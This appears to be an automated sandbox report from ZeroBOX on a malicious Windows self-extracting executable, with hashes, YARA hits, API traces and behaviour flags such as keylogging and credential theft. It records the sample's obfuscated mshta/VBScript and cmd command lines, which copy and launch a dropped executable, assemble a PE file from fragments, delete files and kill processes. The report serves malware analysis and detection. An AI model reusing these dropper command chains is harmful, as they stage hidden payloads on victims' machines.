popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

sfx_123_209.exe

Malicious Library Downloader UPX HTTP DNS ScreenShot Create Service KeyLogger Internet API P2P DGA Hijack Network Http API persistence FTP Socket Escalate priviledges Code injection Sniff Audio Steal credential AntiDebug PE File AntiVM PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 Oct. 7, 2021, 4:29 p.m. Oct. 7, 2021, 4:32 p.m.
Size 1.1MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 7b2ea8fcffd2ce8548c4be3e42dcb60f
SHA256 a8e1e13995a1af35365965d172b801e128f52da0afc6a6a6fc7180210614c2fc
CRC32 0186C316
ssdeep 24576:4CRVwYkTdTFVbOSv9z1BHMK6UJy2gVibh8kBFnohBgyeT8ml0i:hUTTV1XHxJy2aiblBFohmye1
PDB Path d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: The process cannot access the file because it is being used by another process.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: SUCCESS: The process "sfx_123_209.exe" with PID 896 has been terminated.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Xj5YWD.Tg
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: pgMY8C.~
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: nmS1._
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0
pdb_path d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x737b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x736d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73621000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x736d2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73791000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73431000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76f71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76ba1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73401000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76ec1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76cc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75461000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x771e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x715b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76f71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x765c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76ba1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73741000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x733f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x736d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73361000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73621000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x736d2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73791000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73751000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73331000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x732e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73281000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73431000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76cc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75461000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x771e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73071000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72f61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ed1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75491000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x764a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73161000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e51000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2212
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x764a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2212
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x737b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2212
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x736d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2212
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73621000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2212
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x736d2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2212
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73791000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2212
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73431000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2212
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76f71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2212
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76ba1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2212
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73401000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2212
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76ec1000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 10932568064
free_bytes_available: 10932568064
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE
cmdline C:\Windows\system32\cmd.exe /S /D /c" eCHo "
cmdline mshTa vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if ""-pb0sP2z4l4ZpZ1d2K9 "" == """" for %Q IN ( ""C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
cmdline "C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if ""-pb0sP2z4l4ZpZ1d2K9 "" == """" for %Q IN ( ""C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
cmdline C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>Xj5YWD.Tg"
cmdline MsHta VBSCripT: cLOsE ( cReAteObJeCt ( "WscRIpt.ShelL" ). RuN ( "CMd.exE /c eCHo | seT /P = ""MZ"" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q * " , 0 , TrUE ) )
cmdline mshTa vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
cmdline "C:\Windows\System32\mshta.exe" VBSCripT: cLOsE ( cReAteObJeCt ( "WscRIpt.ShelL" ). RuN ( "CMd.exE /c eCHo | seT /P = ""MZ"" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q * " , 0 , TrUE ) )
cmdline CMd.exE /c eCHo | seT /P = "MZ" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q *
cmdline C:\Windows\System32\cmd.exe /Q /c TyPe "C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "-pb0sP2z4l4ZpZ1d2K9 " == "" for %Q IN ( "C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE" ) do taskkill /f /Im "%~nxQ"
cmdline "C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
cmdline "C:\Windows\System32\cmd.exe" /c eCHo | seT /P = "MZ" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q *
cmdline "C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "-pb0sP2z4l4ZpZ1d2K9 " == "" for %Q IN ( "C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE" ) do taskkill /f /Im "%~nxQ"
cmdline "C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe" ) do taskkill /f /Im "%~nxQ"
cmdline C:\Windows\System32\cmd.exe /Q /c TyPe "C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe" ) do taskkill /f /Im "%~nxQ"
file C:\Users\test22\AppData\Local\Temp\SmD2fE1.N
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sfx_123_209.exe")
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /Q /c TyPe "C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe" ) do taskkill /f /Im "%~nxQ"
filepath: C:\Windows\System32\cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /Q /c TyPe "C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "-pb0sP2z4l4ZpZ1d2K9 " == "" for %Q IN ( "C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE" ) do taskkill /f /Im "%~nxQ"
filepath: C:\Windows\System32\cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: CMd.exE
parameters: /c eCHo | seT /P = "MZ" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q *
filepath: CMd.exE
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://crl.comodo.net/TrustedCertificateServices.crl0
url http://users.ocsp.d-trust.net03
url http://crl.ssc.lt/root-b/cacrl.crl0
url http://crl.securetrust.com/STCA.crl0
url http://crl.securetrust.com/SGCA.crl0
url http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
url http://www.ssc.lt/cps03
url http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
url http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
url http://www.microsoft.com/pki/certs/TrustListPCA.crt0
url https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
url http://www.pkioverheid.nl/policies/root-policy0
url http://cps.chambersign.org/cps/chambersroot.html0
url http://www.e-szigno.hu/SZSZ/0
url http://www.entrust.net/CRL/Client1.crl0
url http://crl.chambersign.org/publicnotaryroot.crl0
url http://crl.comodo.net/AAACertificateServices.crl0
url http://www.certplus.com/CRL/class3.crl0
url http://logo.verisign.com/vslogo.gif0
url http://www.acabogacia.org/doc0
url http://www.disig.sk/ca/crl/ca_disig.crl0
url https://www.catcert.net/verarrel
url http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url http://www.sk.ee/cps/0
url http://www.quovadis.bm0
url https://www.catcert.net/verarrel05
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
url http://crl.chambersign.org/chambersroot.crl0
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
url http://crl.globalsign.net/root-r2.crl0
url http://certificates.starfieldtech.com/repository/1604
url http://www.d-trust.net0
url http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
url http://crl.ssc.lt/root-a/cacrl.crl0
url http://crl.usertrust.com/UTN-DATACorpSGC.crl0
url http://www.certicamara.com/certicamaraca.crl0
url http://www.d-trust.net/crl/d-trust_root_class_2_ca_2007.crl0
url http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
url http://www.post.trust.ie/reposit/cps.html0
url http://qual.ocsp.d-trust.net0
url http://www2.public-trust.com/crl/ct/ctroot.crl0
url http://www.certicamara.com0
url http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
url http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
url http://www.comsign.co.il/cps0
url http://crl.usertrust.com/UTN-USERFirst-NetworkApplications.crl0
url http://www.microsoft.com/pki/crl/products/TrustListPCA.crl
url http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
url http://www.signatur.rtr.at/de/directory/cps.html0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Install itself for autorun at Windows startup rule Persistence
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Hijack network configuration rule Hijack_Network
description Match Windows Inet API call rule Str_Win32_Internet_API
Time & API Arguments Status Return Repeated

NtTerminateProcess

 status_code: 0x00000001
process_identifier: 896
process_handle: 0x000001bc
0 0

NtTerminateProcess

 status_code: 0x00000001
process_identifier: 896
process_handle: 0x000001bc
1 0 0
cmdline mshTa vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if ""-pb0sP2z4l4ZpZ1d2K9 "" == """" for %Q IN ( ""C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
cmdline "C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if ""-pb0sP2z4l4ZpZ1d2K9 "" == """" for %Q IN ( ""C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
cmdline mshTa vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
cmdline taskkill /f /Im "sfx_123_209.exe"
cmdline C:\Windows\System32\cmd.exe /Q /c TyPe "C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "-pb0sP2z4l4ZpZ1d2K9 " == "" for %Q IN ( "C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE" ) do taskkill /f /Im "%~nxQ"
cmdline "C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
cmdline "C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "-pb0sP2z4l4ZpZ1d2K9 " == "" for %Q IN ( "C:\Users\test22\AppData\Local\Temp\aDLsKHQL9R.exE" ) do taskkill /f /Im "%~nxQ"
